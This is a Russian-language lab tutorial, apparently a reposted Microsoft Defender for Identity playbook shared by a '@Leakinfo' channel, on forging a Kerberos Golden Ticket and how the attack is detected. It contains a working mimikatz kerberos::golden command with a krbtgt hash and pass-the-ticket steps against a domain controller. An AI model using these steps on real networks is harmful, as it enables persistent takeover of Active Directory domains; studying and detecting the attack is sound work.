Атака Golden Ticket — существующий пользователь
@LeakinfoПосле получения доступа к Golden Ticket (учетная запись krbtgt описана в разделе о вредоносной репликации) злоумышленник может подписать билеты так, будто они являются контроллерами домена. Mimikatz, ИД безопасности домена и украденная учетная запись krbtgt являются обязательными компонентами при выполнении подобной атаки. Мы можем создавать билеты не только для имеющегося пользователя, но и для пользователей, которые еще не существуют.
1. От имени пользователя JeffL выполните указанную ниже команду на компьютере VictimPC, чтобы получить ИД безопасности домена:
whoami /user
2. Определите и скопируйте ИД безопасности домена, показанный на приведенном выше снимке экрана.
3. С помощью Mimikatz используйте скопированный идентификатор безопасности домена вместе с украденным NTLM-хэшем пользователя krbtgt для создания TGT. Вставьте следующий текст в cmd.exe от имени пользователя JeffL:
mimikatz.exe "privilege::debug" "kerberos::golden /domain:contoso.azure /sid:S-1-5-21-2839646386-741382897-445212193 /krbtgt:c96537e5dca507ee7cfdede66d33103e /user:SamiraA /ticket:c:\temp\GTSamiraA_2018-11-28.kirbi /ptt" "exit"
Часть /ptt команды позволяет немедленно передать созданный билет в память.
4. Давайте убедимся, что учетные данные находятся в памяти. Выполните klist в консоли.
5. Выступая в качестве злоумышленника, выполните следующую команду передачи билета, чтобы использовать ее на контроллере домена:
dir \\ContosoDC\c$
Готово! Вы сформировали фальшивый Golden Ticket для пользователя SamiraA.
Почему это сработало? Атака Golden Ticket работает из-за того, что созданный билет был правильно подписан с помощью ключа KRBTGT, который был получен ранее. Этот билет позволяет нам, как злоумышленнику, получить доступ к ContosoDC и добавить себя в любую нужную группу безопасности.
Golden Ticket — обнаружение атаки существующего пользователя
Defender для удостоверений использует несколько методов для обнаружения возможных атак этого типа. В этом сценарии Defender для удостоверений был обнаружен переход фальшивого билета на более слабое шифрование.
Напоминание. До тех пор, пока полученный злоумышленником ключ KRBTGT остается допустимым в среде, созданные с его помощью билеты также остаются действительными. В этом случае злоумышленник достигает устойчивого захвата управления доменом, пока KRBTGT не буде сброшен дважды.
- 🦋 Слитая информация - @Leakinfo
- 🎭 Наша группа > - Точка входа
- ❤️ Поблагодарить Bitcoin